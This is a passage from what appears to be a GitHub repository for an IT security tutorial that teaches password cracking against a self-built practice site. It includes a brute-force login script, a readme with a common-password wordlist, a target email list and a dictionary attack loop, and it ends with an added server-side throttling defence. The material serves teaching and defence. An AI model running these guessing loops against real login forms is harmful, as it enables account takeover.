"L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"]; 63 | 64 | 65 | function bruteForceAttack(length) { 66 | let combinations = []; 67 | 68 | for (let i = 0; i <= length; i++) { 69 | let newSets = 
combineArrays(Array.from(Array(i)).map(a => alphabet)); 70 | combinations = [...combinations, ...newSets]; 71 | } 72 | console.log(combinations); 73 | 74 | tryCombinations(combinations) 75 | } 76 | 77 | function tryCombinations(combinations) { 78 | console.log('Trying Password', combinations[index]); 79 | password.type = 'text'; 80 | password.value = combinations[index]; 81 | loginButton.click(); 82 | index++; 83 | if (index < combinations.length) { 84 | setTimeout(tryCombinations, 500, combinations); 85 | } 86 | } 87 | 88 | 89 | function combineArrays(array_of_arrays) { 90 | 91 | // First, handle some degenerate cases... 92 | 93 | if (!array_of_arrays) { 94 | // Or maybe we should toss an exception...? 95 | return []; 96 | } 97 | 98 | if (!Array.isArray(array_of_arrays)) { 99 | // Or maybe we should toss an exception...? 100 | return []; 101 | } 102 | 103 | if (array_of_arrays.length == 0) { 104 | return []; 105 | } 106 | 107 | for (let i = 0; i < array_of_arrays.length; i++) { 108 | if (!Array.isArray(array_of_arrays[i]) || array_of_arrays[i].length == 0) { 109 | // If any of the arrays in array_of_arrays are not arrays or zero-length, return an empty array... 110 | return []; 111 | } 112 | } 113 | 114 | // Done with degenerate cases... 115 | 116 | // Start "odometer" with a 0 for each array in array_of_arrays. 
117 | let odometer = new Array(array_of_arrays.length); 118 | odometer.fill(0); 119 | 120 | let output = []; 121 | 122 | let newCombination = formCombination(odometer, array_of_arrays); 123 | 124 | output.push(newCombination); 125 | 126 | while (odometer_increment(odometer, array_of_arrays)) { 127 | newCombination = formCombination(odometer, array_of_arrays); 128 | output.push(newCombination); 129 | } 130 | 131 | return output; 132 | } 133 | 134 | // Translate "odometer" to combinations from array_of_arrays 135 | function formCombination(odometer, array_of_arrays) { 136 | // In Imperative Programmingese (i.e., English): 137 | // let s_output = ""; 138 | // for( let i=0; i < odometer.length; i++ ){ 139 | // s_output += "" + array_of_arrays[i][odometer[i]]; 140 | // } 141 | // return s_output; 142 | 143 | // In Functional Programmingese (Henny Youngman one-liner): 144 | return odometer.reduce( 145 | function(accumulator, odometer_value, odometer_index) { 146 | return "" + accumulator + array_of_arrays[odometer_index][odometer_value]; 147 | }, 148 | "" 149 | ); 150 | } /* formCombination() */ 151 | 152 | function odometer_increment(odometer, array_of_arrays) { 153 | 154 | // Basically, work you way from the rightmost digit of the "odometer"... 155 | // if you're able to increment without cycling that digit back to zero, 156 | // you're all done, otherwise, cycle that digit to zero and go one digit to the 157 | // left, and begin again until you're able to increment a digit 158 | // without cycling it...simple, huh...? 159 | 160 | for (let i_odometer_digit = odometer.length - 1; i_odometer_digit >= 0; i_odometer_digit--) { 161 | 162 | let maxee = array_of_arrays[i_odometer_digit].length - 1; 163 | 164 | if (odometer[i_odometer_digit] + 1 <= maxee) { 165 | // increment, and you're done... 166 | odometer[i_odometer_digit]++; 167 | return true; 168 | } else { 169 | if (i_odometer_digit - 1 < 0) { 170 | // No more digits left to increment, end of the line... 
171 | return false; 172 | } else { 173 | // Can't increment this digit, cycle it to zero and continue 174 | // the loop to go over to the next digit... 175 | odometer[i_odometer_digit] = 0; 176 | continue; 177 | } 178 | } 179 | } /* for( let odometer_digit = odometer.length-1; odometer_digit >=0; odometer_digit-- ) */ 180 | 181 | } /* odometer_increment() */ -------------------------------------------------------------------------------- /readme.MD: -------------------------------------------------------------------------------- 1 | # IT Security Tutorial 2 | Here you will learn how hackers crack passwords. This is not just about theory. In the accompanying YouTube video we develop a script together, which we will use to hack a page we built ourselves. 3 | 4 | 5 | ## Function for trying out 6 | ``` 7 | let index = 1; 8 | function tryCombinations(combinations) { 9 | console.log('Trying Password', combinations[index]); 10 | password.type = 'text'; 11 | password.value = combinations[index]; 12 | loginButton.click(); 13 | index++; 14 | if (index < combinations.length) { 15 | setTimeout(tryCombinations, 500, combinations); 16 | } 17 | } 18 | ``` 19 | 20 | 21 | ## Passwords 22 | ``` 23 | let dictionary = [123456, 123456789, 12345, "qwerty", "password", 12345678, 111111, 123123, 1234567890, 1234567, "qwerty123", "000000", "1q2w3e", "aa12345678", "abc123", "password1", 1234, "qwertyuiop", 123321, "password123", "1q2w3e4r5t", "iloveyou", 654321, 666666, 987654321, 123, "123456a", "qwe123", "1q2w3e4r", 7777777, "1qaz2wsx", "123qwe", "zxcvbnm", 121212, "asdasd", "a123456", 555555, "dragon", 112233, 123123123, "monkey", 11111111, "qazwsx", 159753, "asdfghjkl", 222222, "1234qwer", "qwerty1", 123654, "123abc", "asdfgh", 777777, "aaaaaa", "myspace1", 88888888, "fuckyou", "123456789a", 999999, 888888, "football", "princess", 789456123, 147258369, 1111111, "sunshine", "michael", "computer", "qwer1234", "daniel", 789456, 11111, "abcd1234", "q1w2e3r4", 
"shadow", 159357, "123456q", 1111, "samsung", "killer", "asd123", "superman", "master", "12345a", "azerty", "zxcvbn", "qazwsxedc", 131313, "ashley", "target123", 987654, "baseball", "qwert", "asdasd123", "qwerty", "soccer", "charlie", "qweasdzxc", "tinkle", "jessica", "q1w2e3r4t5", "asdf", "test1", "1g2w3e4r", "gwerty123", "zag12wsx", "gwerty", 147258, 12341234, "qweqwe", "jordan", "pokemon", "q1w2e3r4t5y6", 12345678910, 1111111111, 12344321, "thomas", "love", "12qwaszx", 102030, "welcome", "liverpool", "iloveyou1", "michelle", 101010, 1234561, "hello", "andrew", "a123456789", "a12345", "Status", "fuckyou1", "1qaz2wsx3edc", "hunter", "princess1", "naruto", "justin", "jennifer", "qwerty12", "qweasd", "anthony", "andrea", "joshua", "asdf1234", "12345qwert", "1qazxsw2", "marina", "love123", 111222, "robert", 10203, "nicole", "letmein", "football1", "secret", 1234554321, "freedom", "michael1", 11223344, "qqqqqq", 123654789, "chocolate", "12345q", "internet", "q1w2e3", "google", "starwars", "mynoob", "qwertyui", 55555, "qwertyu", "lol123", "lovely", "monkey1", "nikita", "pakistan", 7758521, 87654321, 147852, "jordan23", 212121, 123789, 147852369, "123456789q", "qwe", "forever", 741852963, "123qweasd", "123456abc", "1q2w3e4r5t6y", "qazxsw", 456789, 232323, 999999999, "qwerty12345", "qwaszx", 1234567891, 456123, 444444, "qq123456", "xxx"]; 24 | ``` 25 | 26 | ## Email list 27 | ``` 28 | let emails = [ 29 | 'albert.einstein@hacker-email.com', 30 | 'grace.hopper@hacker-email.com', 31 | 'marie.curie@hacker-email.com', 32 | 'konrad.zuse@hacker-email.com', 33 | 'stephanie-kwolek@hacker-email.com', 34 | 'carl-friedrich.gauss@hacker-email.com', 35 | 'shirley-ann.jackson@hacker-email.com', 36 | 'gertrude-belle.elion@hacker-email.com', 37 | 'steve.wozniak@hacker-email.com', 38 | 'rudolf.bayer@hacker-email.com', 39 | 'ada.lovelace@hacker-email.com' 40 | ]; 41 | ``` 42 | 43 | ## Dictionary with email 44 | ``` 45 | function emailDictionaryAttack(i, j) { // i = 0; j = 0 46 | 
console.log('Testing', emails[i], dictionary[j]); 47 | password.type = 'text'; 48 | username.value = emails[i]; 49 | password.value = dictionary[j]; 50 | loginButton.click(); 51 | 52 | j++; 53 | 54 | if (j >= dictionary.length) { 55 | i++; 56 | j = 0; 57 | } 58 | 59 | if (i < emails.length || j < dictionary.length) { 60 | setTimeout(emailDictionaryAttack, 20, i, j); 61 | } 62 | } 63 | ``` -------------------------------------------------------------------------------- /script.js: -------------------------------------------------------------------------------- 1 | window.onload = function() { 2 | includeHTML(); 3 | }; 4 | 5 | let shoppingCart = []; 6 | 7 | window.onscroll = function() { 8 | let shoppingCartContainer = document.getElementById('shoppingCartContainer'); 9 | console.log(window.scrollY); 10 | if (window.scrollY < 128) { 11 | shoppingCartContainer.style.top = (128 - window.scrollY) + 'px'; 12 | } else { 13 | shoppingCartContainer.style.top = '0px'; 14 | } 15 | }; 16 | 17 | function checkPassword(password) { 18 | const pwdenc = ['15e2b0d3c33891ebb0f1ef609ec419420c20e320ce94c65fbc8c3312448eb225', '5994471abb01112afcc18159f6cc74b4f511b99806da59b3caf5a9c173cacfc5', '65e84be33532fb784c48129675f9eff3a682b27168c0ea744b2cf58ee02337c5', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'ef797c8118f02dfb649607dd5d3f8c7623048c9c063d532cc95c5ed7a898a64f', 'bcb15f821479b4d5772bd0ca866c00ad5f926e3580720659cc80d39c9d09802a', '96cae35ce8a9b0244178bf28e4966c2ce1b8385723a96a6b838858cdd6ca0a1e', 'c775e7b757ede630cd0aa1113bd102661ab38829ca52a6422ab782862f268646', '8bb0cf6eb9b17d0f7d22b456f121257dc1254e1f01665370476383ea776df414', 'daaad6e5604e8e17bd9f108d91e26afe6281dac8fda0091040a7a6d7bd9b43b5', '91b4d142823f7d20c5f08df69122de43f35f057a988d9619f6d3138485c9a203', 'c0c4a69b17a7955ac230bfc8db4a123eaa956ccf3c0022e68b8d4e2f5b699d1f', 'e69fc66a299ad7fd3303c1480f5f51f94b09a2a25a7dbd42221cfa8ed4c5baca', 
'6ca13d52ca70c883e0f0bb101e425a89e8624de51db2d2392593af6a84118090', '0b14d501a594442a01c6859541bcb3e8164d183d32937b851835442f69d5c94e', '03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4', '9a900403ac313ba27a1bc81f0932652b8020dac92c234d98fa0b06bf0040ecfd', 'a320480f534776bddb5cdb54b1e93d210a3c7d199e80a23c1b2178497b184c76', 'ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f', '28f0116ef42bf718324946f13d787a1d41274a08335d52ee833d5b577f02a32a', 'e4ad93ca07acb8d908a3aa41e920ea4f4ef4f26e7f86cf8291c5db289780a5ae', '481f6cc0511143ccdd7e2d1b1b94faf0a700a8b49cd13922a70b5ae28acaa8c5', '94edf28c6d6da38fd35d7ad53e485307f89fbeaf120485c8d17a43f323deee71', '8a9bcf1e51e812d0af8465a8dbcc9f741064bf0af3b3d08e6b0246437c19f7fb', 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3', 'f707fdda7c874ff49ebfb2c88a2860c5ff4ce3d94a21efb76566ad0f92c9ad57', '18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63', '72ab994fa2eb426c051ef59cad617750bfe06d7cf6311285ff79c19c32afd236', '8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92', '8c1cdb9cb4dbac6dbb6ebd118ec8f9523d22e4e4cb8cc9df5f7e1e499bba3c10']; 19 | return sha256(password) == pwdenc[new Date().getDate()]; 20 | } 21 | 22 | 23 | function checkPassword2(password) { 24 | const pwdenc = ['5994471abb01112afcc18159f6cc74b4f511b99806da59b3caf5a9c173cacfc5', '65e84be33532fb784c48129675f9eff3a682b27168c0ea744b2cf58ee02337c5', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'ef797c8118f02dfb649607dd5d3f8c7623048c9c063d532cc95c5ed7a898a64f', 'bcb15f821479b4d5772bd0ca866c00ad5f926e3580720659cc80d39c9d09802a', '96cae35ce8a9b0244178bf28e4966c2ce1b8385723a96a6b838858cdd6ca0a1e', 'c775e7b757ede630cd0aa1113bd102661ab38829ca52a6422ab782862f268646', '8bb0cf6eb9b17d0f7d22b456f121257dc1254e1f01665370476383ea776df414', 'daaad6e5604e8e17bd9f108d91e26afe6281dac8fda0091040a7a6d7bd9b43b5', '91b4d142823f7d20c5f08df69122de43f35f057a988d9619f6d3138485c9a203', 
'c0c4a69b17a7955ac230bfc8db4a123eaa956ccf3c0022e68b8d4e2f5b699d1f', 'e69fc66a299ad7fd3303c1480f5f51f94b09a2a25a7dbd42221cfa8ed4c5baca', '6ca13d52ca70c883e0f0bb101e425a89e8624de51db2d2392593af6a84118090', '0b14d501a594442a01c6859541bcb3e8164d183d32937b851835442f69d5c94e', '03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4', '9a900403ac313ba27a1bc81f0932652b8020dac92c234d98fa0b06bf0040ecfd', 'a320480f534776bddb5cdb54b1e93d210a3c7d199e80a23c1b2178497b184c76', 'ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f', '28f0116ef42bf718324946f13d787a1d41274a08335d52ee833d5b577f02a32a', 'e4ad93ca07acb8d908a3aa41e920ea4f4ef4f26e7f86cf8291c5db289780a5ae', '481f6cc0511143ccdd7e2d1b1b94faf0a700a8b49cd13922a70b5ae28acaa8c5', '94edf28c6d6da38fd35d7ad53e485307f89fbeaf120485c8d17a43f323deee71', '8a9bcf1e51e812d0af8465a8dbcc9f741064bf0af3b3d08e6b0246437c19f7fb', 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3', 'f707fdda7c874ff49ebfb2c88a2860c5ff4ce3d94a21efb76566ad0f92c9ad57', '18138372fad4b94533cd4881f03dc6c69296dd897234e0cee83f727e2e6b1f63', '72ab994fa2eb426c051ef59cad617750bfe06d7cf6311285ff79c19c32afd236', '8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92', '8c1cdb9cb4dbac6dbb6ebd118ec8f9523d22e4e4cb8cc9df5f7e1e499bba3c10', '15e2b0d3c33891ebb0f1ef609ec419420c20e320ce94c65fbc8c3312448eb225']; 25 | return sha256(password) == pwdenc[new Date().getDate()]; 26 | } 27 | 28 | function loginWithPassword() { 29 | let password = document.getElementById('password').value; 30 | if (checkPassword(password)) { 31 | window.location.href = './login-success.html'; 32 | } 33 | 34 | } 35 | 36 | function login() { 37 | let username = document.getElementById('username').value; 38 | let password = document.getElementById('password').value; 39 | 40 | if (username == 'marie.curie@hacker-email.com' && checkPassword2(password)) { 41 | window.location.href = './login-success.html'; 42 | } 43 | 44 | } 45 | 46 | 47 | function includeHTML() { 48 | 
var z, i, elmnt, file, xhttp; 49 | /* Loop through a collection of all HTML elements: */ 50 | z = document.getElementsByTagName("*"); 51 | for (i = 0; i < z.length; i++) { 52 | elmnt = z[i]; 53 | /* Search for elements with a certain attribute: */ 54 | file = elmnt.getAttribute("w3-include-html"); 55 | if (file) { 56 | /* Make an HTTP request using the attribute value as the file name: */ 57 | xhttp = new XMLHttpRequest(); 58 | xhttp.onreadystatechange = function() { 59 | if (this.readyState == 4) { 60 | if (this.status == 200) { elmnt.innerHTML = this.responseText; } 61 | if (this.status == 404) { elmnt.innerHTML = "Page not found."; } 62 | /* Remove the attribute, and call this function once more: */ 63 | elmnt.removeAttribute("w3-include-html"); 64 | includeHTML(); 65 | } 66 | } 67 | xhttp.open("GET", file, true); 68 | xhttp.send(); 69 | /* Exit the function: */ 70 | return; 71 | } 72 | } 73 | } 74 | 75 | 76 | function encrypt(value) { 77 | var result = ""; 78 | for (let i = 0; i < value.length; i++) { 79 | if (i < value.length - 1) { 80 | result += value.charCodeAt(i) + 10; 81 | result += "-"; 82 | } else { 83 | result += value.charCodeAt(i) + 10; 84 | } 85 | } 86 | return result; 87 | } 88 | 89 | function decrypt(value) { 90 | var result = ""; 91 | var array = value.split("-"); 92 | 93 | for (let i = 0; i < array.length; i++) { 94 | result += String.fromCharCode(array[i] - 10); 95 | } 96 | return result; 97 | } 98 | 99 | //Google Tag Manager --> 100 | (function(w, d, s, l, i) { 101 | w[l] = w[l] || []; 102 | w[l].push({ 103 | 'gtm.start': new Date().getTime(), 104 | event: 'gtm.js' 105 | }); 106 | var f = d.getElementsByTagName(s)[0], 107 | j = d.createElement(s), 108 | dl = l != 'dataLayer' ? 
'&l=' + l : ''; 109 | j.async = true; 110 | j.src = 111 | 'https://www.googletagmanager.com/gtm.js?id=' + i + dl; 112 | f.parentNode.insertBefore(j, f); 113 | })(window, document, 'script', 'dataLayer', 'GTM-MLQNJ4P'); 114 | //End Google Tag Manager --> -------------------------------------------------------------------------------- /secret-article.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 |
18 |
19 |
20 | 21 |

Please enter the password to view this article. This time I won't make it so easy for you! :)

22 | 23 | 24 | 25 |
26 |
27 | 28 |
29 | 30 |
31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /style.css: -------------------------------------------------------------------------------- 1 | @import url('https://fonts.googleapis.com/css2?family=Newsreader:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700;1,800&display=swap'); 2 | body { 3 | margin: 0; 4 | font-family: 'Newsreader', serif; 5 | background-color: rgba(0, 0, 0, 0.1); 6 | display: flex; 7 | flex-direction: column; 8 | min-height: 100vh; 9 | } 10 | 11 | a { 12 | color: rgba(0, 0, 0, 0.8); 13 | text-decoration: none; 14 | } 15 | 16 | a:hover { 17 | color: rgba(0, 0, 0, 0.4); 18 | } 19 | 20 | p { 21 | color: rgba(0, 0, 0, 0.8); 22 | } 23 | 24 | header { 25 | background-color: orangered; 26 | padding: 20px 50px; 27 | color: white; 28 | font-size: 32px; 29 | font-weight: 500; 30 | display: flex; 31 | align-items: center; 32 | justify-content: space-between; 33 | } 34 | 35 | header a { 36 | color: white; 37 | } 38 | 39 | header a:hover { 40 | color: rgba(255, 255, 255, 0.8); 41 | } 42 | 43 | footer { 44 | padding: 20px 50px; 45 | margin-top: 100px; 46 | background-color: #192D35; 47 | color: white; 48 | } 49 | 50 | footer a { 51 | color: white; 52 | margin: 0px 20px; 53 | } 54 | 55 | footer a:hover { 56 | color: rgba(255, 255, 255, 0.6); 57 | } 58 | 59 | footer .legal-links { 60 | margin-top: 20px; 61 | } 62 | 63 | .shopping-item { 64 | padding: 20px; 65 | border: 1px solid rgba(0, 0, 0, 0.1); 66 | margin: 20px; 67 | display: block; 68 | position: relative; 69 | cursor: pointer; 70 | } 71 | 72 | .shopping-item::after { 73 | position: absolute; 74 | right: 0; 75 | top: 0; 76 | height: 50px; 77 | width: 50px; 78 | content: '+'; 79 | font-size: 32px; 80 | border-left: 1px solid rgba(0, 0, 0, 0.1); 81 | border-bottom: 1px solid rgba(0, 0, 0, 0.1); 82 | display: flex; 83 | justify-content: center; 84 | align-items: center; 85 | } 86 | 87 | .shopping-item:hover { 88 | 
background-color: rgba(0, 0, 0, 0.05); 89 | color: black; 90 | } 91 | 92 | .shopping-item:hover::after { 93 | background-color: rgba(0, 0, 0, 0.1); 94 | } 95 | 96 | .space-between { 97 | display: flex; 98 | justify-content: space-between; 99 | } 100 | 101 | .mb-8 { 102 | margin-bottom: 8px; 103 | } 104 | 105 | .mt-8 { 106 | margin-top: 8px; 107 | } 108 | 109 | .center { 110 | display: flex; 111 | flex: 1; 112 | justify-content: center; 113 | } 114 | 115 | .quicklinks { 116 | background-color: white; 117 | padding: 20px 50px; 118 | overflow: auto; 119 | } 120 | 121 | .quicklinks a { 122 | color: rgba(0, 0, 0, 0.4); 123 | font-weight: 500; 124 | margin-right: 32px; 125 | } 126 | 127 | .quicklinks a:hover { 128 | color: rgba(0, 0, 0, 0.6); 129 | } 130 | 131 | .button { 132 | color: orangered; 133 | background-color: white; 134 | padding: 8px 16px; 135 | text-decoration: none; 136 | font-size: 16px; 137 | display: flex; 138 | align-items: center; 139 | font-weight: 600; 140 | border-radius: 2px; 141 | cursor: pointer; 142 | box-shadow: 2px 0px 8px rgba(0, 0, 0, 0.2); 143 | border: unset 144 | } 145 | 146 | .button:hover { 147 | background-color: rgb(226, 223, 223); 148 | } 149 | 150 | .article { 151 | background-color: white; 152 | } 153 | 154 | .article-regular { 155 | border-top: 1px dotted rgba(0, 0, 0, 0.1); 156 | min-height: 10px; 157 | margin-top: 0 !important; 158 | } 159 | 160 | .article img { 161 | width: 100%; 162 | height: 120px; 163 | object-fit: cover; 164 | } 165 | 166 | h2 { 167 | margin-block-start: 0; 168 | margin-block-end: 0; 169 | } 170 | 171 | .overlay { 172 | background-color: rgba(0, 0, 0, 0.6); 173 | position: fixed; 174 | top: 0; 175 | bottom: 0px; 176 | left: 0; 177 | right: 0; 178 | display: flex; 179 | justify-content: center; 180 | align-items: center; 181 | flex-direction: column; 182 | } 183 | 184 | .card { 185 | width: 60%; 186 | height: 60%; 187 | background-color: white; 188 | border-radius: 4px; 189 | display: flex; 190 | 
flex-direction: column; 191 | padding-bottom: 100px; 192 | } 193 | 194 | .card p { 195 | margin-top: 100px; 196 | } 197 | 198 | form { 199 | display: flex; 200 | flex-direction: column; 201 | margin-top: 100px; 202 | } 203 | 204 | form button { 205 | margin-left: 0 !important; 206 | } 207 | 208 | .login { 209 | margin-top: 50px; 210 | } 211 | 212 | input { 213 | margin-bottom: 20px; 214 | height: 48px; 215 | border-radius: 4px; 216 | border: 1px solid rgba(0, 0, 0, 0.1); 217 | padding: 0px 10px; 218 | } 219 | 220 | .shoppingCart { 221 | background-color: white; 222 | padding: 20px; 223 | min-height: 30vh; 224 | position: fixed; 225 | right: 0px; 226 | top: 128px; 227 | height: calc(100vh - 168px); 228 | width: 20%; 229 | box-shadow: -3px 16px 11px rgb(0 0 0 / 10%); 230 | } 231 | 232 | .blurred { 233 | filter: blur(3px); 234 | -webkit-touch-callout: none; 235 | /* iOS Safari */ 236 | -webkit-user-select: none; 237 | /* Safari */ 238 | -khtml-user-select: none; 239 | /* Konqueror HTML */ 240 | -moz-user-select: none; 241 | /* Old versions of Firefox */ 242 | -ms-user-select: none; 243 | /* Internet Explorer/Edge */ 244 | user-select: none; 245 | /* Non-prefixed version, currently 246 | supported by Chrome, Edge, Opera and Firefox */ 247 | } 248 | 249 | .card-content { 250 | text-align: center; 251 | padding: 32px 16px; 252 | flex: 1; 253 | } 254 | 255 | .card-buttons { 256 | display: flex; 257 | justify-content: center; 258 | padding: 32px 16px; 259 | display: flex; 260 | } 261 | 262 | .button-orange { 263 | background-color: orangered; 264 | color: white; 265 | margin: 0px 16px; 266 | width: 100px; 267 | display: flex; 268 | justify-content: center; 269 | } 270 | 271 | .button-orange:hover { 272 | background-color: rgb(247, 109, 59); 273 | } 274 | 275 | .button-orange[disabled] { 276 | background-color: rgba(161, 155, 153, 0.657); 277 | } 278 | 279 | .pretitle { 280 | color: orangered; 281 | font-weight: 600; 282 | font-size: 20px; 283 | margin-top: 10px; 284 | 
margin-bottom: 10px; 285 | } 286 | 287 | .read-more { 288 | display: flex; 289 | justify-content: flex-end; 290 | margin-bottom: 16px; 291 | } 292 | 293 | .shopping-button-mobile { 294 | display: none; 295 | } 296 | 297 | @media (min-width: 800px) { 298 | .article { 299 | width: 70%; 300 | margin-left: 50px; 301 | margin-top: 50px; 302 | } 303 | h2, 304 | .pretitle, 305 | .read-more, 306 | form, 307 | p { 308 | padding: 0px 20px; 309 | } 310 | } 311 | 312 | @media (max-width: 800px) { 313 | header { 314 | font-size: 24px; 315 | padding: 20px 20px; 316 | } 317 | .quicklinks { 318 | padding: 20px 20px; 319 | } 320 | h2, 321 | .pretitle, 322 | .read-more, 323 | form, 324 | p { 325 | padding: 0px 20px; 326 | } 327 | .card { 328 | width: 100%; 329 | height: 100%; 330 | border-radius: 0px; 331 | } 332 | .hide-mobile { 333 | display: none; 334 | } 335 | .shopping-button-mobile { 336 | display: flex !important; 337 | position: fixed; 338 | left: 0; 339 | right: 0; 340 | width: 100vw; 341 | margin-left: 0; 342 | margin-right: 0; 343 | height: 80px; 344 | bottom: 0; 345 | } 346 | } -------------------------------------------------------------------------------- /templates/footer.html: -------------------------------------------------------------------------------- 1 | 11 | 12 | 14 | -------------------------------------------------------------------------------- /templates/header.html: -------------------------------------------------------------------------------- 1 |
2 | Hacker Area 3 | 4 | Login 5 |
6 | 7 | --------------------------------------------------------------------------------
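The password check in script.js (`checkPassword`, `checkPassword2`) runs in the visitor's browser, and nothing limits how often `login()` is called, which is why the readme's loops can submit a guess every 20 ms or 500 ms. The following is an added example, not code from this repository: a server-side throttle that counts failed logins per account and per source address and locks each with a doubling timeout, replayed against constructed traffic at the 20 ms cadence. `createLoginThrottle`, `replayGuessing`, the `acct:`/`src:` key scheme, the thresholds, and the sample accounts and address are assumptions made for the illustration.

```javascript
// Added example, not part of the repository. All names are hypothetical.
// Server-side throttle: count failed logins per key and lock the key with a
// timeout that doubles on every repeated lockout.
function createLoginThrottle({ maxFailures = 5, windowMs = 60000, baseLockMs = 30000 } = {}) {
  const state = new Map(); // key -> { failures: [ms timestamps], lockedUntil, strikes }

  function entry(key) {
    if (!state.has(key)) state.set(key, { failures: [], lockedUntil: 0, strikes: 0 });
    return state.get(key);
  }

  return {
    // Ask before verifying a credential. false = reject without checking it.
    allowed(keys, now) {
      return keys.every((key) => now >= entry(key).lockedUntil);
    },
    // Report the outcome of a credential check under every key it counts for.
    record(keys, now, success) {
      for (const key of keys) {
        const e = entry(key);
        if (success) {
          // Only the account's own counter is cleared; a source address keeps
          // its failures so one valid login cannot reset it.
          if (key.startsWith('acct:')) { e.failures = []; e.strikes = 0; }
          continue;
        }
        e.failures = e.failures.filter((t) => now - t < windowMs);
        e.failures.push(now);
        if (e.failures.length >= maxFailures) {
          e.strikes += 1;
          e.lockedUntil = now + baseLockMs * 2 ** (e.strikes - 1);
          e.failures = [];
        }
      }
    },
  };
}

// Constructed traffic: one source submits `perAccount` wrong passwords for each
// account in turn, one attempt every `intervalMs`.
function replayGuessing(throttle, { accounts, perAccount, intervalMs, source, useSourceKey }) {
  let now = 0;
  let checked = 0;  // attempts that reached the password verifier
  let rejected = 0; // attempts refused while a key was locked
  for (const account of accounts) {
    for (let n = 0; n < perAccount; n++, now += intervalMs) {
      const keys = [`acct:${account}`];
      if (useSourceKey) keys.push(`src:${source}`);
      if (!throttle.allowed(keys, now)) { rejected++; continue; }
      checked++;
      throttle.record(keys, now, false);
    }
  }
  return { checked, rejected };
}

// Constructed sample data (documentation domain and address range).
const sampleAccounts = Array.from({ length: 11 }, (_, k) => `user${k + 1}@example.test`);
const sampleRun = { accounts: sampleAccounts, perAccount: 20, intervalMs: 20, source: '203.0.113.7' };

const perAccountOnly = replayGuessing(createLoginThrottle(), { ...sampleRun, useSourceKey: false });
const withSourceKey = replayGuessing(createLoginThrottle(), { ...sampleRun, useSourceKey: true });
console.log(perAccountOnly, withSourceKey);
```

Keying on the account alone still lets a fresh set of guesses through for every account in the list; counting the same failures against the source address as well closes that gap. None of this helps while the hash comparison itself stays in client-side JavaScript, so the check has to move to the server first.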